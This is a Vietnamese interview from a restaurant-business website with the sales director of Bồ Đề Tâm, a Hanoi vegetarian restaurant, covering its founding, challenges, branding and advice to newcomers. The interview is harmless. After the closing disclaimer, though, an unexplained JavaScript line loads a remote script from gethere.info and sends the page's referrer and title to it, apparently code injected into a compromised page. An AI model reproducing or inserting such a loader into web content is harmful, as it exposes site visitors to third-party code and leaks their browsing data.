Bồ Đề Tâm – Kinh doanh nhà hàng chay có gì đặc biệt?

Giữa con phố Phạm Huy Thông  của Hà Nội, có một nhà hàng năm yên tĩnh và lặng lẽ, nơi  bất cứ ai đến đó cũng có thể tìm cho mình được cảm giác nhẹ nhàng từ trong tâm hồn, như chính cái tên của nhà hàng đó – Bồ Đề Tâm.

Hôm nay, kinhdoanhnhahang.vn may mắn được có cuộc trò chuyện cùng chị Phạm Thu Ngân, giám đốc kinh doanh của Bồ Đề Tâm, để nghe chị chia sẻ về câu chuyện kinh doanh của nhà hàng chay Bồ Đề Tâm.

Kinhdoanhnhahang (KDNH): Đầu tiên, cám ơn chị đã đồng ý tham gia buổi phỏng vấn ngày hôm nay của kinh doanh nhà hàng.

Chị Phạm Thu Ngân (PTN): Cảm ơn em đã đến với Bồ Đề Tâm ngày hôm nay, hy vọng em sẽ thích không gian của nhà hàng cũng như phong cách ẩm thực của Bồ Đề Tâm.

KDNH: Chị có thể chia sẻ về bản thân và lý do tại sao Bồ Đề Tâm được mở ra và trở thành nhà hàng chuyên về món chay?

PTN: Bồ Đề Tâm được khai trương vào năm 2011, vào thời điểm đó nhà hàng chay chưa nhiều và thói quen ăn chay tại các nhà hàng của người Hà Nội chưa có. Đây quả thực là một thị trường tiềm năng vì việc ăn chay ở khu vực miền Nam rất phát triển vì vậy chúng tôi đã quyết định mở ra nhà hàng Bồ Đề Tâm.

KDNH: Việc kinh doanh món ăn chay có những thuận lợi và khó khăn gì? Và nhà hàng có bị hạn chế trong việc tiếp cận khách hàng bởi chỉ kinh doanh món chay không?

PTN: Những ngày đầu tiên của Bồ Đề Tâm vô cùng khó khăn, vì thói quen ăn chay của thực khách Hà Nội chưa có, để thay đổi một thói quen của ai đó thật sự khó. Nhưng cũng có thuận lợi ở chỗ khi đó tại Hà Nội có ít nhà hàng chay nên khi Bồ Đề Tâm ra mắt đã khiến nhiều thực khách tò mò, muốn tìm hiểu. Chính điều đó đã kéo thực khách gần hơn với Bồ Đề Tâm.

Hơn nữa, vì là nhà hàng chay nên Bồ Đề Tâm chắc chắn là có nhiều hạn chế trong việc tiếp cận khách hàng. Nhưng Bồ Đề Tâm cũng có một lợi thế đó là khách hàng từ những hệ thống nhà hàng đồng quê đã có thương hiệu của chúng tôi, và Bồ Đề Tâm đã tiếp cận chính những vị khách đó với phương châm: “Khách hàng ăn đồ mặn sẽ là những khách hàng ăn đồ chay”.

KDNH: Ý nghĩa của cái tên Bồ Đề Tâm mà anh/chị đặt cho nhà hàng là gì?

PTN: Việc nghĩ tên là một điều quan trọng đối một thương hiệu, Ban lãnh đạo công ty đã suy nghĩ và đắn đo rất nhiều. Cuối cùng quyết định chọn thương hiệu “Bồ Đề Tâm” với ý nghĩa mong muốn lan tỏa cái Tâm Bồ Đề, cái tâm chân thành nơi cội nguồn của mọi sự kỳ diệu trong cuộc sống.

KDNH: Trong quá trình xây dựng và hoạt động, nhà hàng đã gặp phải những khó khăn nào?
PTN: Có vô vàn khó khăn ngay từ những ngày đầu tiên bắt tay vào xây dựng nhà hàng cũng như xây dựng thương hiệu. Chúng tôi nhận thấy rõ việc Bồ Đề Tâm sẽ là thương hiệu định hướng cho một phong cách ẩm thực tại Hà Nội. Từ việc setup nhà hàng như thế nào, thực đơn món ăn cần những gì, cử đầu bếp đi học ở đâu, đào tạo đội ngũ nhân viên ra làm sao. Mọi thứ đều mới mẻ nhưng tôi thấy rất tuyệt vời khi được là một viên gạch xây dựng nên Bồ Đề Tâm từ những ngày đầu tiên ấy.

KDNH: Nhà hàng đã tạo được một chỗ đứng riêng trong lòng khách hàng giữa khá nhiều các nhà hàng chay khác, anh/chị cho rằng đâu là lý do khách hàng tin tưởng và yêu quý nhà hàng của mình?
CN: Qua 7 năm xây dựng và phát triển thương hiệu Bồ Đề Tâm đến nay cũng đã được nhiều thực khách biết đến. Chúng tôi luôn chia sẻ với các thành viên của mình rằng Bồ Đề Tâm là cái Tâm chân thành, phục vụ khách hàng từ những điều nhỏ nhất. Mang đến cho khách hàng cảm giác an tâm cũng như thư thái nhất khi đến với nhà hàng.

KDNH: Nhà hàng đã sử dụng những kênh quảng cáo nào để tiếp thị cho hình ảnh của mình?
CN: Để có được thành công như ngày hôm nay Bồ Đề Tâm thực sự phải tri ân đến rất nhiều các anh chị nhà báo đã quan tâm và giới thiệu, quảng bá Bồ Đề Tâm đến với thực khách. Các trang mạng xã hội cũng là một công cụ vô cùng hữu ích, và ngay ngày mai, sau khi gặp các bạn ở kinhdoanhnhahang thì tôi tin chắc rằng Bồ Đề Tâm sẽ được biết đến nhiều thêm nữa.

KDNH: Dự định sắp tới của nhà hàng trong tương lai là gì?
PTN: Bồ Đề Tâm đã được phục vụ rất nhiều những buổi tiệc lớn, phục vụ nhiều Quý thầy từ mọi miền đất nước, phục vụ vô vàn những gia đình có nhu cầu ăn chay, cũng như trên dưới 20 tiệc cưới chay tại Hà Nội. Và Bồ Đề Tâm rất hy vọng rằng sẽ còn phục vụ được nhiều, nhiều hơn thế nữa những bữa tiệc chay như vậy.

KDNH: Chị có chia sẻ gì tới những người trẻ đang muốn dấn thân vào con đường kinh doanh nhà hàng?

PTN: Các hệ thống nhà hàng ẩm thực của chúng tôi đã có mặt tại Hà Nội từ rất lâu, có thương hiệu đã được hơn 20 tuổi. Đó thật sự là một chặng đua đường trường. Với bất kỳ một bạn trẻ nào muốn dấn thân vào lĩnh vực này cần thực sự đam mê, có tâm với nghề, một kế hoạch dài hơi vì chắc chắn rằng để xây dựng một thương hiệu có tên tuổi không thể chỉ ngày một ngày hai.

Cảm ơn em và hy vọng sẽ được phục vụ em tại Bồ Đề Tâm!

(Bài viết này được thực hiện bởi chuyên trang Kinhdoanhnhahang.vn, website chính thức và duy nhất cung cấp những kiến thức nhà hàng, bài học thành công của những chủ doanh nghiệp tại Hà Nội. Những quan điểm trong bài phỏng vấn thể hiện quan điểm riêng của khách mời, không phản ánh quan điểm của Kinhdoanhnhahang.vn).

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;